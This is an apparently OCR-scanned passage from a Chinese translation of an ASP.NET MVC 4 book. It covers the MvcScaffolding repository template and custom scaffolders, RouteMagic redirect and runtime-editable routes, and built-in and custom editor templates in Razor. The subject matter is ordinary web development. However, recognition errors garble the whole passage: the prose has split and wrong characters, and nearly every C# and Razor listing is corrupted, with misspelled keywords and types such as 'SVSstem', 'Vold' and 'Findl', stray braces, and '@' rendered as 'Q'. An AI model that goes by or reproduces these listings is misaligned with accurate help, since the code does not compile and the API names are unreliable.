以 外 频繁 地 发 布 更 新 ， 而 我 们 可 以 通过 NuGet 使 用 这 些 更 新 。 

正 是 由 于 上 面 所 列 出 的 最 后 一 个 原因 ， 我 们 不 打算 为 MvcScaffolding 包 编 写 详细 的 文 
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档 ， 因 为 可 能 当 您 读 到 我 们 撰写 的 文档 时 ， 它 已 过 时 。 当 然 ， 我 们 会 给 出 它 的 工作 机 制 的 
概述 ， 然 后 指出 相应 的 Web 引用 ， 这 样 就 可 以 跟 上 它 未 来 更 新 的 步伐 。 
15.4.3 ”更 新 的 Add Controller 对 话 框 选项 

MvcScaffolding 包 癌 Add Controller 对 话 框 中 添加 了 两 个 新 选项 ， 


Controller name | 
StorelanagerC ontroller | 


如 图 15-10 所 示 。 


[= re | 


seaffolding optiens 


Empty MVC eontreller 

MVC controller with read/write actions and views, using Entity Frarmevwork 

MVC controller with empty read/ write actions 

Empty API controller 

APl controller with read/write actions, using Entity Framework 

API contreller with empty read/write actions 

MveSeafitelding: Controller with resd/write sction nd views, using EF dats ccess code 
Mycscaffolding: Controller with read/write action and views, Using r ald 


Razor 


15-10 


es MvcoScaffolding: Controller with read/write actions and vilews, using EF data 
access code 一 一 这 与 默认 的 “Controller with read/write actions and views, using EF ” 模 
板 非常 类 似 。 但 做 了 一 些小 的 改进 ， 比 如 在 创建 和 更 新 情形 中 共同 的 部 分 视图 的 使 用 。 
e MvcScaffolding: Controller with read/write actions and views, using repositories 一 一 这 


是 MvcScaffolding 包 添 加 的 非常 令 人 感 兴 趣 的 模板 ， 下 面 会 进行 介绍 。 
15.4.4 ”使 用 库 模板 


为 了 使 用 库 模板 ， 下 面 添加 一 个 新 控制 器 ， 并 选择 “MvcScaffolding: Controller with 
read/write actions and views, using repositories ”模板 ， 如 图 15-11 所 示 。 


Controller name 


HorelManagerController 
cafiolding options 
Template 
NhveSeatfolding: Controller with read/write action and views, Using repostones 
Model class: 
&lbum (hhrchdusic tore.lodels) 


Qata contedt class: 
Tew data contet...» 
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上 面 操作 使 用 一 个 新 控制 器 (和 视图 ) 奉 换 了 MVC Music Store 应 用 程序 中 已 有 的 
StoreManagerController 控制 器 。 正 如 第 4 章 所 所 介绍 的 ， 新 控制 器 把 数据 访问 代码 提取 到 
了 一 个 单独 的 AlbumRepository 类 中 ,而 不 是 在 控制 器 中 包含 Entity Framework 数据 访问 代 
但 。AlbumRepository 类 的 代码 如 下 所 示 : 


USing 
US1ing 
US1ing 
using 
using 
USing 
usSing 


SVSstem; 
System.Collections.Generic; 
SyStem.Data; 
System.Data.Entity; 
SySstem.Lindg; 
SySstem.Ling.Expressions; 
System.Web; 


namespace MvcMusicSstore.Models 


{ 


public class AlbumRepository : IAlbumRepository 


{ 
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MusicSstoreEntities context = new MusicSstoreEntities'({(); 
public IQueryable<Album> All 
{ 
get { return context.Albums; |} 
} 
public IQueryable<Album> AllIncludingl( 
params Expression<Func<Album, object>>[|] includeProperties) 


{ 
IQueryable<Album> query = context .Albums; 
foreach (var includeProperty jin includeProperties) I 
Query = dquery.Include (includeProperty);} 
} 
return query: 
} 
public Album Findl(int id) 
{ 
return context.Albums.Find(id); 
} 
public Vold InsertorUpdate (Album album) 
{ 
if (album.Albumld == default (int)) i 
/ New entity 
CoOnteXt .Albums.Add (album).; 
} else I 
// Existing entity 
context.Entry (album) .State = EntityState.Modified; 
} 
} 
Public void Delete (int 1d) 
{ 


Var album = context .Albums.Find(1id)}); 
context .Albums.Remove (album);} 
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} 
public void Save() 
{ 
context .SaveChanges (})} 
} 


} 


public interface IAlbumRepository 

1 
IQueryable<Album> All { get; } 
IQueryable<Album> AllIncluding i 

params Expression<Func<Album, object>>[] includeProperties)});} 

Album Findl(int id).; 
vold InsertorUpdate (Album album); 
Vold Delete(int id); 
VOIld Save (); 

} 

} 


数据 访问 逻辑 和 控制 器 代码 分 离 可 以 币 来 很 多 好 处 。 例 如 ， 我 们 可 以 容易 地 测试 控制 
器 代码 ， 正 如 13.3.1 节 中 所 介绍 的 。 此 外 ， 我 们 还 可 以 在 项 目的 其 他 地 方 实现 库 的 重用 。 
15.4.5 添加 基 架 器 

MvcScaffolding 系统 使 用 基 架 器 来 生成 代码 。 我 们 可 以 创建 目 己 的 基 架 器 。 使 用 目 定 
义 基 架 器 生成 代码 的 最 方便 、 最 容易 (但 稍微 有 点 令 人 费解 ) 的 方式 便 是 使 用 MvcScaffolding 
中 包含 的 CustomScaffolder 基 架 器 。 

例如 ， 为 创建 一 个 处 理 新 控制 器 方案 的 新 基 架 器 ， 只 需 在 包 管理 器 控制 台中 输入 如 下 


命令 : 
Scaffold CustomScaffolder AwesomeController 


这 样 就 把 AwesomeController 基 架 器 要 求 的 文件 添加 到 了 项 目的 新 文件 严 CodeTemplates\ 
Scaffolders\AwesomeController 中 。 当 然 我 们 需要 为 基 架 器 编辑 生成 的 代码 ， 其 他 一 切 都 已 
经 自动 设置 ， 因 此 ， 我 们 只 需 专 注 于 使 基 架 器 唯一 的 代码 。 


15.4.6 ”额外 资源 


下 如 前 面 承诺 的 , 我 们 已 经 对 MvcScaffolding 进行 了 高 层次 地 讨论 。 因为 它 更 新 较 快 ， 
在 撰写 本 文 时 ， 关 于 MvcScaffolding 的 最 好 资源 可 以 在 Steven Sanderson(MvcScaffolding 
的 主要 作者 ) 的 博客 上 看 到 ， 网 址 为 http://blog.stevensanderson.cony?s=scaffolding。 


15.5 ”高 级 路 由 


正如 第 9 章 结束 时 提 到 的 ， 学 习 路 由 很 容易 ， 但 是 要 完全 掌握 ， 进 而 达到 融会 贯通 的 


站 
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程度 却 面临 很 大 的 挑战 。 下 面 是 Phil 推荐 的 一 些 高 级 技巧 , 以 简化 一 些 复杂 路 由 应 用 方案 。 
15.5.1 RouteMagic 


第 9 章 提 到 了 RouteMasgic 项 目 ， 它 是 一 个 开源 项 目 ， 可 在 CodePlex 上 上 下载， 网址 为 
http://routemagic.codeplex.com/。 


Install-Package RouteMagic.Mvc 


该 项 目 也 可 以 作为 一 个 NuGet 包 获 取 ， 包 的 名 称 为 RouteMagic。RouteMagic 是 Phil 
Haack( 本 书 作者 之 一 ) 的 一 个 宠物 项 目 ， 其 中 包含 对 ASPNET 路 由 的 有 用 扩展 ， 而 在 框架 

包含 在 RouteMagic 包 中 的 一 个 有 用 扩展 便 是 对 重 定 回路 由 的 文 持 。 上 正如 可 用 性 专家 
Jakob Nielsen 建议 的 ,“ 持 久 的 URL 不 会 改变 ”， 重 定 同 路 由 可 以 帮助 支持 这 一 功能 。 

路 由 的 好 处 之 一 是 ， 我 们 可 以 在 开发 期 间 通 过 操纵 路 由 来 改变 URL 结构 。 这 样 站 点 
上 的 所 有 URL 会 自动 更 新 为 正确 的 URL， 这 是 一 个 很 棒 的 功能 。 但 是 一 旦 把 站 点 部 署 到 
公共 服务 磺 上 , 这 个 特性 就 变 得 有 害 了 ,因为 用 户 都 开始 链接 我 们 已 经 部 车 的 URL。 此 时 ， 
不 能 改变 路 由 ， 人 否则 会 破坏 传 入 的 每 一 个 URL。 

但 此 时 我 们 可 以 进行 重 定向 。 安 装 RouteMagic 之 后 ,我 们 可 以 编写 重 定 向 路 由 来 接收 
原来 路 由 的 URL， 并 把 它 重 定 疝 到 一 个 新 路 由 ， 代 人 码 如 下 : 

Var newRoute = routes.MapRoute ("new", "bar/{controller}/{id}/{action}™); 

routes.Redirect(r => Ir.MapRoute(" "oldRoute", 


"foo/{controller}/{action}/{id}") 
) .To (newRoute);} 


加 果 想 更 深入 地 学 习 RouteMagic， 请 登录 RouteMagic CodePlex 网 站 。 在 那里 ， 我 们 
会 发 现 RouteMagic 是 路 由 应 用 中 一 个 不 可 或 缺 的 工具 。 


15.5.2 可 编辑 路 由 


通常 情况 下 ，ASPNET MVC 应 用 程序 一 旦 部 署 ， 就 不 能 再 改变 它 的 路 由 ， 除 非 重 新 
编译 应 用 程序 ， 重 新 部 署 定义 路 由 的 程序 集 。 

更 改 路 由 需要 重新 编译 部 署 的 部 分 原因 在 于 设计 ， 因 为 路 由 通常 认为 是 应 用 程序 代 
码 ， 并 且 应 该 有 相关 的 单元 测试 来 证 实 路 由 的 正确 性 。 一 个 配置 错误 的 路 由 可 能 会 严重 破 

但 是 还 存在 许多 情形 ， 可 以 在 不 用 重 编译 应 用 程序 的 情况 下 ， 很 容易 地 修改 应 用 程序 
的 路 由 ， 比 如 高 度 灵活 的 内 容 管理 系统 或 博客 引擎 。 

前 面 提 到 的 RouteMagic 项 目 文 持 在 程序 运行 时 修改 路 由 。 首 先 ， 回 ASPNET MVC 4 
医用 程序 的 App_Start 目录 下 添加 新 的 Routes 类 ， 如 图 15-12 所 示 。 

然后 使 用 Visual Studio 的 Properties 对 话 框 把 文件 的 Build Action 属性 标记 为 Content， 
以 免 它 被 编译 到 应 用 程序 中 ， 如 图 15-13 所 示 。 
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Solution Explorer 
省 日 -关外 国 怕 
Search Solution Explorer (Cirl#:) 


EJ EditableRoutesDemo 
PP properties 
加 References 
国 App_Data 
天 上 pp_Start 
他 Config 


国 Content 
天 Controllers 
本 Images 
ml Models 
4 全 Samples Advanced 
4 全 EditableRoutes Browse to URL 
b cE AppStart EditableRouteReqgistration.cs Build Action Content 
b ce ConfigChangeNotifier.cs Copy to Output Directory 。 Do not copy 
b ce RouteRegistrar.cs Custom Tool 
b cc RouteRegistrationExtensions,cs 


a 


Custom Toel Namespace 


i Scripts 


: 上 日 Misc 
~ a File Name Routes,cs 
aVICON.Ico Full Path cusers\jonmdoc 


dd Globalasax 


DD packages.config 
Wi Web,config 


Advanced 


Solution Explorer Server Explorer 


15-12 图 15-13 


作者 有 意 从 创建 时 编译 中 排除 Route.cs 文件 ， 因 为 我 们 希望 能 够 在 运行 时 动态 地 编译 
它 。 下 面 是 文件 Route.cs 中 的 代码 。 不 必 担 心 手动 输入 这 些 代 人 码 ， 本 节 最 后 会 提供 它 的 
NuGet 包 。 


USing System.Web.Mvc; 

USing System.Web.Routing; 

USing RouteMagic; 

public class Routes : IRouteRegistrar 


{ 
public void ReglisterRoutes (RouteCollection routes) 
{ 
routes.IgnoreRoute("{resource} .axd/{*pathIinfo}™); 
routes .MapRoute ( 
name: "Default™", 
url: "{controller}/{action}/{id}"™, 
defaults: new { controller = "Home™, 
action = "Index"™, 
1d = UrlParameter.Optional } 
js 
} 
} 


注意 ” RouteMagic 编译 系统 将 会 查找 一 个 没有 名 称 空间 的 类 Routes。 如 
果 使 用 不 同 的 类 名 称 或 者 忘记 删除 名 称 空间 ， 路 由 就 不 能 注册 ， 
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Ronutes 类 是 实现 了 和 定义 在 RouteMasgic 程序 集 的 接口 了 豚 outeRegistrar。 接 口中 定义 了 方 
法 RegisterRoutes。 
然后 在 App_Start/RouteConfig.cs 修改 路 由 注册 ， 以 便 使 用 新 扩展 方法 注册 路 由 : 


USinNng System; 

USing SySstem.Collections.Generic; 
USing System.Ling; 

USing System.Web; 

Uslng SYystem.Web.Mvc; 

Uslng SYystem.Web.Routing; 

USing RouteMagic; 


namespace Wrox.ProMvc4.EditableRoutes 


{ 
public class RouteConfig 
{ 
public static Vold RegisterRoutes (RouteCollection routes) 
{ 
RouteTable.Routes.RegisterRoutes ("~/App Start/Routes.cs");} 
} 
} 
} 


完成 这 些 之 后 ， 我 们 就 可 以 在 部 署 应 用 程序 之 后 ， 在 App_Start 目录 中 的 Routes.cs 文 
件 中 修改 路 由 ， 而 不 必 重 新 编译 应 用 程序 。 

为 了 在 操作 中 看 到 效果 ， 我 们 可 以 运行 应 用 程序 ， 碍 看 出 现 的 标准 主页 。 然 后 ， 在 应 
用 程序 运行 的 情况 下 ， 修 改 默 认 路 由 ， 把 Account 控制 器 和 Login 操作 设置 为 路 由 默认 : 


Using System.Web.Mvc; 


Uslng SYystem.Web.Routing; 
USing RouteMagic; 


public class Routes : IRouteReglistrar 


{ 
public void ReglisterRoutes (RouteCollection routes) 
{ 
routes.IgnoreRoute("{resource} .axd/{*pathIinfo}™); 
routes .MapRoute ( 
name: "Default™, 
url: "{controller}/{action}/{id}™", 
defaults: new { controller = "Account"™", 
action = "Login", 
1d = UrlParameter.Optional } 
下 
} 
} 


当 我 们 刷新 页 面 时 ， 束 会 看 到 出 现 的 是 Login 视图 。 
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可 编辑 路 由 : 内 幕 


可 编辑 路 由 使 用 方法 看 似 简单 ， 那 是 因为 我 们 隐藏 了 RouteCollection 扩展 方法 中 的 所 
有 复杂 内 容 。 方 法 中 我 们 使 用 了 两 个 技巧 来 动态 生成 中 等 信任 的 路 由 代码 ， 而 不 必 重 启 应 
用 程序 : 

(1) 我 们 使 用 ASPNET BuildManager 来 动态 创建 Routes.cs 文件 中 的 程序 集 。 然 后 根据 
该 程序 集 ， 我 们 可 以 创建 Routes 类 型 的 实例 ， 并 把 创建 的 实例 转换 为 [RouteHandler 类 型 。 

(2) 我 们 使 用 ASPNET Cache 可 以 得 到 Routes.cs 文件 改变 的 通知 ， 所 以 知道 该 文件 需 
要 重新 创建 。 当 文件 改变 (使 Cache 无 效 ) 时 ，ASPNET Cache 允许 我 们 在 文件 和 调用 方法 
上 设置 缓存 依赖 。 

RouteMagic 使 用 下 面 的 代码 添加 指向 Routes.cs 文件 和 回调 方法 的 缓存 依赖 ， 当 改变 
Routes.cs 文件 时 ， 指 回 的 回调 方法 可 以 用 来 重新 载 入 路 由 ; 

USing SYStem; 

USing SySstem.Web.Complilation; 


USing System.Web.Routing; 
USslIng RouteMagic.Internals; 


namespace RouteMagic 
{ 
public static class RouteReglstrationExtensions 
{ 
Public static void RegisterRoutes (this RouteCollectijion routes, 
string virtualPpath)} 


{ 
if (String.IsNullOoOrEmpty (virtualPath)})) 
L 
throw new ArgumentNullException("virtualPpath"™); 
} 
routes.ReloadRoutes (virtualPath); 
ConfigFileChangeNotifier.Listen (virtualPath., 
routes.ReloadRoutes)});} 
} 


static void ReloadRoutes (this RouteCollection routes, 
string virtualPpath) 
{ 
Var assembly = BuildManager.GetCompliledAssembly! 
virtualpath); 
Var registrar = assembly.CreatelInstance(" "Routes") 
as IRouteRegistrar; 
USing (routes.GetWriteLock()) 
L 
TOULeS .CTLear 1() ， 
1f {reqistrar = nullili 
{ 


了 全 可 工 SET -REG1LSLETROULeSLEGOUEES) : 
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} 


} 


还 有 一 个 有 趣 的 技巧 : 文件 更 新 通知 的 实现 是 利用 了 ASPNET 团队 成 员 David Ebbo 
在 ASPNET Dynamic Data 基 架 系统 上 的 成 果 ConfigFileChangeNotifier。 如 果 需 要 代码 ， 想 
更 深入 地 了 解 技 术 背 景 ， 请 访问 Phil Haack 的 博客 ， 网 址 为 http://haacked.com/archive/ 
2010/01/17/editable-routes.aspx。 


15.6 ”高 级 模板 


第 5 章 引 入 了 模板 辅助 方法 。 模 板 辅助 方法 是 HTML 辅助 方法 的 子 集 ， 其 中 包括 
EditorFor 和 DisplayFor 辅助 方法 。 因 为 它们 使 用 模型 元 数据 和 模板 来 泻 染 HIML 标记 , 所 
以 通 凋 称 为 模板 辅助 方法 。 为 了 唤起 记忆 ， 想 象 下 面 所 示 的 一 个 模型 对 象 上 的 Price 属性 。 

public decimal Price { get; sets; } 

可 以 使 用 EditorFor 辅助 方法 为 Price 属性 创建 一 个 输入 : 
QHtml .EditorFor (m=>m. Price) 

泻 染 的 结果 HTML 如 下 所 示 : 


<input class="text—box single-line™” id="Price" 
name="Price™" type="text" value="8.99"™ /> 


前 面 已 经 介绍 了 如 何 通 过 数据 注解 特性 ( 像 Display 和 DisplayFormat) 和 添加 模型 元 数 
据 来 改变 辅助 方法 的 输出 。 到 目前 为 止 ， 我 们 还 没有 讲解 如 何 使 用 目 定 义 的 模板 ， 重 写 默 
认 模 板 以 改变 输出 。 目 定义 模板 简单 而 强大 ， 但 是 在 介绍 构建 日 定义 模板 之 前 ， 我 们 首先 
介绍 内 置 模板 的 工作 机 人 制 。 
15.6.1 默认 模板 

ASPNET MVC 框架 包含 一 组 内 置 的 模板 ， 模 板 辅助 方法 可 以 用 它们 来 构建 HTML。 
每 个 辅助 方法 根据 模型 的 信息 (模型 类 型 和 模型 元 数据 ) 选 择 一 个 模板 。 例 如 ， 下 面 是 一 个 
名 为 IsDiscounted 的 bool 类 型 属性 : 

Public bool IsDiscounted { get; set; |} 

再 次 使 用 EditorFor 辅助 方法 创建 该 属性 的 输入 : 

QHtm]l .EditorFor (m=>m. IsDiscounted) 

这 次 ， 辅 助 方法 泻 染 了 一 个 复 选 框 输入 元 素 ， 而 为 Price 属性 泻 染 的 编辑 器 却 是 一 个 
文本 框 输入 元 素 : 


第 15 章 高 级 主题 


<input class="check-box™” lid="IsDiscounted™ name="lsDiscounted" 
type="checkbox™ value="true™ /> 
<input name="IsDiscounted™" type="hidden™" value="false™" /> 


事实 上 ， 辅 助 方法 泻 染 了 两 个 输入 标签 (对 于 第 2 个 隐藏 的 输入 元 素 ， 第 5 章 的 5.3.5 
节 已 给 出 原因 )， 但 是 它们 在 输出 时 的 主要 区 别 是 因为 EditorFor 辅助 方法 对 bool 类 型 属性 
和 decimal 类 型 属性 采用 了 不 同 的 模板 。 为 bool 类 型 值 提 供 复 选 框 输入 元 素 ， 而 为 decimal 
类 型 属性 值 提 供 一 个 较为 上 自由 的 文本 输入 框 ， 这 样 做 更 有 意义 。 

此 时 ， 您 可 能 极 想 知道 内 置 模板 的 内 容 及 它们 的 位 置 。 为 了 回答 这 些 问题 ， 我 们 需要 
转向 ASPNET MVC 源 代码 和 ASPNET MVC Futures 库 。 


1. ASP.NET MVC Futures 和 模板 定义 


ASPNET MVC 框架 使 用 的 内 置 模板 被 编译 到 System.Web.Mvc 程序 集中 ,不 容易 访问 。 
但 是 我 们 可 以 下 载 ASPNET MVC 4 Futures， 并 且 可 以 得 看 这 些 模板 的 源 代 码 。 下 载 网 址 
为 http://aspnet.codeplex.com/releases/view/58781。 

解压 下 载 的 压缩 文件 ， 会 出 现 一 个 DefaultTemplates 文件 夹 ， 其 中 包含 两 个 子 文件 夹 ; 
EditorTemplates 和 DisplayTemplates。EditorTemplates 文件 夹 中 包含 面向 HTML 辅助 方法 的 
编辑 右 模 板 (Editor、EditorFor、EditorForModel)， 人 而 DisplayTemplates 文件 夹 中 包含 显示 辅 
助 方法 的 模板 (Display、DisplayFor、DisplayForModeD)。 下 面 重 点 介绍 编辑 器 模板 ， 但 是 我 
们 可 以 把 这 里 介绍 的 信息 应 用 到 任何 一 组 模板 中 。 

EditorTemplates 文件 夹 中 包含 8 个 文件 ， 如 图 15-14 所 示 。 


li 国 其 


GS \ 于 «“ Mec3Fulures bb DefauTermplates hk EditorTemplales | 二 地 | | Seorch Ed 下 | 
Organmze ™ Extract all files — ， 园 i 
- Favorites ~ Pn Type ae 
El Desktop 3: Boolean ASP.NET User Contral 
思 Downloads 3- Callecton ASP.NET User Canktral 
-Recent Places E Decimal ASP.NET User Control 
” Dropbox a: Hiddeninput ASP.NET User Control 
a MultlineText ASP.NET User Control 
3 Libraries 3 Object ASP.NET User Control 
Dor nhs 9: Password ASP.NET User Control 
My Vooments 于 String ASP.NET User Control 
Public Documents 
a Music 
= Pictures 一 
8 items | 
| 
| 


15-14 


可 以 认为 ， 模板 类 似 于 部 分 视图 一 一 它们 拥有 一 个 模型 参数 并 泻 染 为 HTML 标记 。 除 
非 模型 元 数据 指定 模板 ， 人 否则 模板 辅助 方法 将 根据 它 泻 染 值 的 类 型 名 称 选择 模板 。 当 请 求 
演 染 类 型 为 System.Boolean 的 属性 ( 像 ISDiscounted) 时 ，EditorFor 会 使 用 模板 Boolean。 而 
当 请 求 泻 染 类 型 为 System.Decimal 的 属性 ( 像 Price) 时 ，EditorFor 会 使 用 模板 Decimal。 接 
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下 来 详细 介绍 模板 选择 。 
Web Forms 和 Razor 模板 
下 载 的 ASPNET Futures 中 的 模板 是 使 用 Web Forms 开发 的 。 然 而， 本 章 后 和 面 创建 目 


定义 模板 时 ， 却 可 以 使 用 市 有 cshtml 扩展 名 的 Razor 视图 。 事 实 上 ，ASPNET MVC 框架 
默认 文 持 这 两 种 格式 的 模板 。 


使 用 Razor 语法 时 ，Decimal 模板 代码 如 下 所 示 : 


Qusing System.Globalization 


QHtml .TextBox("", FormattedValue, new { aclass = "text-box single-line"™ }) 


Qfunctions 
{ 
private object FormattedValue | 
get 1 
ift (ViewData.TemplateInfo.FormattedModelValue == 
ViewData.ModelMetadata.Model) | 
return String.Format( 
CultureInfo.CcurrentCulture, 
{0:0.00}", ViewData.ModelMetadata.Model 
); 
} 


return ViewData.TemplateInfo.FormattedModelValue; 


} 

模板 使 用 TextBox 辅助 方法 创建 了 一 个 带 有 格式 化 模型 值 的 text 类 型 的 输入 元 素 。 注 
等 该 模板 也 使 用 了 ViewData 的 ModelMetadata 和 TemplateInfo 属性 中 的 信息 。ViewData 包 
含 了 模板 中 可 能 用 到 的 大 量 信息 ， 甚 至 最 简单 的 模板 ，String 模板 也 使 用 ViewData。 


QHtml .TextBox("", ViewData.TemplateInfo.FormattedModelValue, 
new { fclass = "text-box single-line™” }) 


en 
局 
~ 


ViewData 的 TemplateInfo 属性 可 以 访问 FormattedModelValue 属性 。 该 属性 的 值 要 么 
是 作为 字符 串 格式 化 的 模型 值 (根据 ModelMetadata 中 的 格式 字符 串 )， 要 么 是 原始 模型 值 
(如 果 没 有 指定 格式 字符 串 的 话 )。ViewData 也 可 以 授权 对 模型 元 数据 的 访问 。 在 Boolean 
编辑 器 模板 (也 就 是 前 而 框架 为 IsDiscounted 属性 所 使 用 的 模板 ) 中 ,我 们 能 看 到 了 运行 中 的 


Qusing System.Globalization 


aif (ViewData.ModelMetadata.IsNullableValueType) { 
@Html .DropDownList("", TristateValues, 
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new { class = "]ist-box tri-state™ }) 
} else I 
QHtml .CheckBox("", Value ?? false, 
new { aclass = "check-box"™ }) 
} 


Qfunctions { 
private List<SelectListItem> TriStateValues 1{ 
get 1 
return new List<SelectListlitem> { 
new SelectListItem 1 
Text = "Not Set", Value = String.Empty, 
Selected = IValue.HasValue 


}, 
new SelectListItem { 
Text = "True", Value = "true”™, 
Selected = Value.HasValue && Value.Value 
}, 
new SelectListItem I 
Text = "False", Value = "false"™, 
Selected = Value.HasValue && !IValue.Value 
}, 
}; 
} 
} 
private bool? Value | 
get 1{ 
if (ViewData.Model == null) I 
return null; 
} 
return Convert.ToBoolean (VijewData.Model., 
CultureInfo.InvariantcCulture); 
} 
} 


} 

虽然 在 Boolean 模板 中 只 有 一 小 部 分 工作 ,但 它 为 空 的 布尔 类 型 属性 (使 用 一 个 下 拉 列 
表 ) 和 非 空 布尔 类 型 属性 (一 个 复 选 框 ) 创 建 了 不 同 的 编辑 器 。 这 里 大 部 分 的 工作 就 是 创建 在 
下 拉 列 表 中 显示 的 列表 项 。 


2. 模板 选择 


框架 根据 模型 的 类 型 名 称 选 择 模板 ， 比 如 对 decimal 类 型 的 属性 使 用 Decimal 模板 来 
演 染 ， 这 些 应 该 是 很 清晰 的 。 但 是 在 图 15-14 中 没有 和 定义 默认 模板 的 类 型 应 该 用 什么 模板 
来 演 染 昵 ?” 比 如 说 Int32 和 DateTime 类 型 ? 

在 检查 模板 匹配 类 型 名 称 以 前 ， 框 架 首 先 检 查 模 型 元 数据 以 确定 是 否 有 模板 存在 。 我 
们 可 以 使 用 UIHint 数 据 注 解 特性 来 指定 要 使 用 的 模板 的 名 称 一 一 后 和 面 将 会 看 到 这 样 的 一 个 
例子 。DataType 特性 也 可 以 影响 模板 的 选择 。 
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[DataType (DataType.MultilineText)| 
Public string Description 1{ get; set; } 


当 泻 染 上 和 耐 描述 的 Description 属性 时 , 框架 会 选择 使 用 MultilineText 模板 。Password 
的 DataType 也 有 一 个 默认 模板 。 

如 果 框 架 不 能 根据 元 数据 找到 一 个 匹配 模板 ， 它 就 会 查找 类 型 名 称 对 应 的 模板 : 对 
String 类 型 使 用 String 模板 ;Decimal 类 型 使 用 Decimal 模板 。 对 于 没有 匹配 模板 的 类 型 ， 
如 果 它 不 是 复合 类 型 ， 框 架 就 会 使 用 String 模板 ; 如果 它 是 一 个 数组 或 列表 的 链接 集合 ， 
框架 束 会 使 用 Collection 模板 .而 Object 模板 可 以 泻 染 所 有 复合 类 型 的 对 象 .例如 ,在 MVC 
Music Store 的 Album 模型 上 使 用 EditorForModel 辅助 方法 就 会 采用 Object 模板 。Object 
是 一 个 复杂 模板 ， 它 使 用 反射 和 模型 元 数据 来 为 模型 上 的 相应 属性 创建 HTML 标记 。 

if (ViewData.TemplateInfo.TemplateDepth > 1) 1 


if (Model == null) { 
QViewData.ModelMetadata.NullDisplayText 


} 
else | 
dViewData.ModelMetadata.SimpleDisplayText 
} 
} 
else | 
foreach (Var prop in ViewData.ModelMetadata 
. Properties 
.Where (pm => ShouldSshow(pm))) 1 
if (prop.HideSurroundingHtm]l) 1 
QHtml .Editor (prop.PropertyName) 
} 
else 1 
1if {({!String.IsNullorEmpty ( 
Html .Label (prop.PropertyName) .ToHtmlstring())}} 1 
<dilv Class="editor-label™"> 
QHtml .Label (prop.PropertyName) 
</div> 
} 
<div class="editor-field"> 
QHtm] .Editor (prop.PropertyName) 
aHtml .ValidationMessage (prop.PropertyName, ™*") 
</div> 
} 
} 
} 


Qfunctions { 
bool ShouldSshow (ModelMetadata metadata) 1 
return metadata .ShowForEdit 
&& Imetadata.lIsComplexType 
&& lViewData.TemplateInfo.Visited (metadata); 
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上 述 Object 模板 代码 中 的 迁 语 句 确保 了 模板 只 通 历 对 象 中 的 一 层 。 换 言 之 ， 对 于 一 个 
带 有 复合 属性 的 复合 对 象 ,， Object 模板 只 显示 复合 属性 的 一 个 简单 汇总 (使 用 模型 元 数据 中 
的 NullDisplayText 或 SimpleDisplayText)。 

如 果 不 想 要 Object 模板 的 行为 或 任何 内 置 模板 的 行为 ,那么 我 们 可 以 定义 目 己 的 模板 
来 重 写 这 些 默认 模板 。 
15.6.2 ”有 自 定 义 模板 


目 定 义 的 模板 存放 在 DisplayTemplates 或 EditorTemplates 文件 夹 中 。 当 解析 模板 路 径 
时 ，ASPNET MVC 框架 会 遵循 一 组 熟悉 的 规则 。 首 先 ， 它 查看 与 一 个 特定 控制 器 视图 相 
关 的 文件 夹 ， 此 外 ， 它 也 查看 文件 夹 Views/Shared 以 确定 是 否 存 在 自 定义 模板 。 框 架 会 查 
找 与 配置 到 应 用 程序 的 每 一 个 视图 引擎 相关 的 模板 ， 因 此 默认 情况 下 ， 框 架 查 找 拥 
有 .aspx、.ascx 和 .cshtml 扩展 名 的 模板 。 

作为 一 个 例子 , 假设 现在 要 创建 一 个 目 定 义 的 Object 模板 ,但 只 能 得 到 与 MVC Music 
Store 的 StoreManager 控制 器 相关 的 视图 。 在 这 样 的 情形 下 ,我 们 可 以 在 Views/StoreManager 
文件 夹 下 创建 一 个 EditorTemplate, 并 日 创建 一 个 Razor 视图 Objectcshtml, 如 图 15-15 所 示 。 


| solution Explorer 


EE 
Search Solution Explorer (Ctrl#:) 


by 国 Filters 

b i Images 

b mg Models 

b i Seripts 

4 加 Views 

天 Account 

天 Home 

天 Shared 

加 ShoppingCart 

国 Store 

a) StoreManager 

4 | EditorTemplates 
[3 Object.cshtml 
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[@] Create,cshtml 

[@] Delete.cshtml 

[@] Details.cshtml 

[®@] Edit,.cshtml 

[@] Index.cshtml 
[@] ViewStart.cshtml 
器 Web,config 


favicon,ico 
@] Global.asax 
I packages.config 
b 0 Web.config 
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™ 


目 定义 模板 可 以 用 来 做 很 多 有 趣 的 事情 。 我 们 可 能 不 喜欢 与 文本 输入 相关 的 模型 样式 
(text-box single-line)， 此 时 ,我 们 可 以 使 用 目 己 的 样式 创建 String 编辑 器 模板 ， 并 把 它 放 在 
Shared\EditorTemplates 文件 夹 中 ， 以 便 在 整个 应 用 程序 中 使 用 。 
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男 一 个 例子 是 ， 为 客户 端 脚 本 生成 data- 特 性 (前 面 第 8 章 已 所 到 )。 例 如 ， 现 在 要 给 
DateTime 属性 的 每 一 个 编辑 右 链 接 一 个 jQuery UI 的 Datepicker 小 部 件 。 默 认 情 况 下 ， 框 
架 使 用 String 模板 演 染 一 个 DateTime 属性 的 编辑 器 ， 但 是 我 们 可 以 创建 DateTime 模板 来 
重 写 这 一 行为 , 因为 当 框 架 辅助 方法 使 用 模板 演 染 一 个 DateTime 值 时 , 它 会 得 找 一 个 名 为 
DataTime 的 模板 。 

QHtml .TextBox("", ViewData.TemplateInfo.FormattedModelValue., 

new { class = "text-box single-line", 


data datepicker="true” 


}) 


我 们 把 上 面 的 代码 放 入 在 名 为 DateTime.cshtml 的 文件 中 ， 再 把 该 文件 再 放 入 
Shared\EditorTemplates 文件 夹 中 .然后 ,如果 要 为 每 个 DateTime 属性 编辑 器 添加 Datepicker 
小 部 件 的 话 ,我 们 所 有 需要 做 的 就 是 编写 一 小 段 客 户 亲 脚 本 (确保 第 8 章 中 介绍 的 jQuery UI 
脚本 和 样式 表 也 包含 在 内 ): 

$s (function () 1{ 

$s$(":inputldata-datepicker=truel]") .datepicker () ; 
}); 

现在 假设 不 想 让 每 一 个 DateTime 编辑 器 都 拥有 Datepicker 小 部 件 , 而 是 让 一 少 部 分 特 
定 的 编辑 器 拥有 。 此 时 ， 可 以 把 目 定 义 的 模板 文件 命名 为 SpecialDateTime.cshtml。 这 样 框 
架 就 不 会 为 DateTime 模型 选择 该 模板 ， 除 非 指定 该 模板 名 称 。 我 们 可 以 使 用 EditorFor 辅 
助 方法 来 指定 模板 名 称 。 在 下 面 例子 中 ， 泻 染 一 个 名 为 ReleaseDate 的 DateTime 属性 : 


QHtml .EditorFor(m => m.ReleaseDate, "SpecialDateTime'") 


另外 ， 也 可 以 在 ReleaseDate 属性 上 放置 一 个 UIHint 特性 来 指定 模板 名 称 : 


[UIHint ("SpecialDateTime™")| 
